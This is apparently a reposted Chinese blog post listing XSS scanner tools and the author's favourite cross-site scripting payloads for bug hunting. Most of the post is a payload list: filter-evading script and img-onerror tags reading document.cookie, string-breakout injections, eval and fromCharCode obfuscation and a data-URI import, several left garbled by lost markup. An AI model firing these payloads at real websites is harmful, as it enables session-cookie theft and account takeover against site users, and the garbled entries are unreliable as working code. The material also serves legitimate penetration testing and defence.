工具集-XSS Payload

XSS介绍

Cross Site Script(XSS) 是将恶意脚本注入到网站中,当攻击者使用web 程序将恶意脚本发送给不同的用户时,就造成了XSS攻击,XSS攻击发生在web 程序任何输入的地方,其根本问题是web程序没有对输入输出做验证和编码。

XSS漏洞扫描工具

BruteXSS

https://github.com/shawarkhanethicalhacker/BruteXSS

XSStrike

https://github.com/UltimateHackers/XSStrike

XSSer kali 自带

4. xsscrpay

https://github.com/DanMcInerney/xsscrapy

XSS Payload

">

scriPt>alert(document.cookie)/sCript>

img src=/ onerror=confir\u006d(document.cookie)/>script>

\";alert(document.domain);//

;alert(document.domain);//

\";alert(document.domain);//

s='">' print

print

'eval(String.fromCharCode('+",".join([str(ord(o))

for o ins])+'))'

;[].constructor.prototype.join=function();eval('alert(1)')

import('data:text/javascript,alert(1)')

"/ondblclick=`

z

o

这是我常用的XSS payload ,更多payload 移步我的github

https://github.com/crhua/xsspayload.git

总结

利用工具挖掘XSS漏洞效率太低,更多的时候是自己手工测试,多看看前辈们写的payload,挖洞的时候构造自己的payload。

  • 发表于:
  • 原文链接http://kuaibao.qq.com/s/20180506G0J34K00?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码关注云+社区

领取腾讯云代金券